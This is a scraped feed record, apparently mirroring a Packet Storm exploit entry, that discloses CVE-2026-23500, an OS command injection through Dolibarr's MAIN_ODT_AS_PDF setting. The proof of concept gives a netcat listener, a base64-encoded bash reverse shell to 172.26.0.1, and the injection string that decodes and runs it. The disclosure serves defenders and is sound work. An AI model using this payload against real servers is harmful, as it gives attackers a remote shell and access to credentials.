{“lastseen”:”2026-04-13T15:45:23″,”description”:”Dolibarr versions 22.0.4 and below suffer from a remote code injection vulnerability via via MAINODTASPDF…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Dolibarr 22.0.4 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218775″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-23500″],”sourceData”:”# CVE-2026-23500: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration in Dolibarr\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2026-23500](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-23500) |\\n | **Severity** | CRITICAL |\\n | **Advisory** | [GHSA-w5j3-8fcr-h87w](https:\/\/github.com\/Dolibarr\/dolibarr\/security\/advisories\/GHSA-w5j3-8fcr-h87w) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **Dolibarr\/dolibarr** (versions: \\u003c= 22.0.4)\\n – **Patched in:** 23.0\\n \\n ## CWE Classification\\n \\n – CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)\\n \\n ## Details\\n \\n ### Summary\\n An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.\\n \\n ### Details\\n The vulnerability is located in `htdocs\/includes\/odtphp\/odf.php`.\\n When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.\\n \\n Code snippet (`htdocs\/includes\/odtphp\/odf.php`, approx line 930):\\n “`php\\n $command = getDolGlobalString(‘MAIN_ODT_AS_PDF’).’ ‘.escapeshellcmd($name);\\n \/\/ …\\n exec($command, $output_arr, $retval);\\n “`\\n \\n While the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.\\n \\n ### PoC\\n **Prerequisites:**\\n 1. Login as an Administrator.\\n 2. Ensure the \\”Commercial Proposals\\” module is enabled and \\”ODT templates\\” are activated in its setup.\\n \\n **Steps to reproduce (Reverse Shell):**\\n \\n 1. Start a netcat listener on the attacker’s machine (IP: `172.26.0.1`, Port: `4445`):\\n “`bash\\n nc -lvnp 4445\\n “`\\n \\n 2. Prepare the payload. To avoid issues with special characters (like `\\u0026` or `\\u003e`) being escaped by the web application or shell, encode the reverse shell command in Base64:\\n “`bash\\n # Command: bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/172.26.0.1\/4445 0\\u003e\\u00261’\\n echo \\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/172.26.0.1\/4445 0\\u003e\\u00261’\\” | base64\\n # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK\\n “`\\n \\n 3. Navigate to **Home -\\u003e Setup -\\u003e Other Setup**.\\n \\n 4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:\\n “`bash\\n jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash\\n “`\\n *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*\\n \\u003cimg width=\\”1898\\” height=\\”696\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/12e4aa61-eb9d-4342-bd03-9a1e824b8316\\” \/\\u003e\\n \\n 5. Navigate to **Commerce -\\u003e New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.\\n \\u003cimg width=\\”1907\\” height=\\”668\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/d790847e-50c1-47eb-994b-b2596b949242\\” \/\\u003e\\n \\u003cimg width=\\”1858\\” height=\\”346\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/afbeb170-d004-49d6-a395-1b4572fbf2e7\\” \/\\u003e\\n \\u003cimg width=\\”848\\” height=\\”183\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1\\” \/\\u003e\\n \\n 6. Check the netcat listener. A connection will be established, granting a shell on the server:\\n \\n \\u003cimg width=\\”616\\” height=\\”193\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/e90817da-9bb2-4fe1-8377-be10d8640e37\\” \/\\u003e\\n \\n \\n ### Impact\\n **Remote Code Execution (RCE).**\\n An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:\\n – Reading sensitive configuration files (database credentials).\\n – Modifying application code.\\n – Full system compromise depending on server configuration (e.g., docker escape, pivoting).\\n \\n —\\n \\n ### Credits\\n Reported by \u0141ukasz Rybak\\n \\n ## References\\n \\n – https:\/\/github.com\/Dolibarr\/dolibarr\/security\/advisories\/GHSA-w5j3-8fcr-h87w\\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-23500\\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218775″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218775\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-13T15:45:23″,”description”:”Dolibarr versions 22.0.4 and below suffer from a remote code injection vulnerability via via MAINODTASPDF…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Dolibarr 22.0.4 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218775″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-23500″],”sourceData”:”# CVE-2026-23500: OS Command Injection (RCE) via…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-46298","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n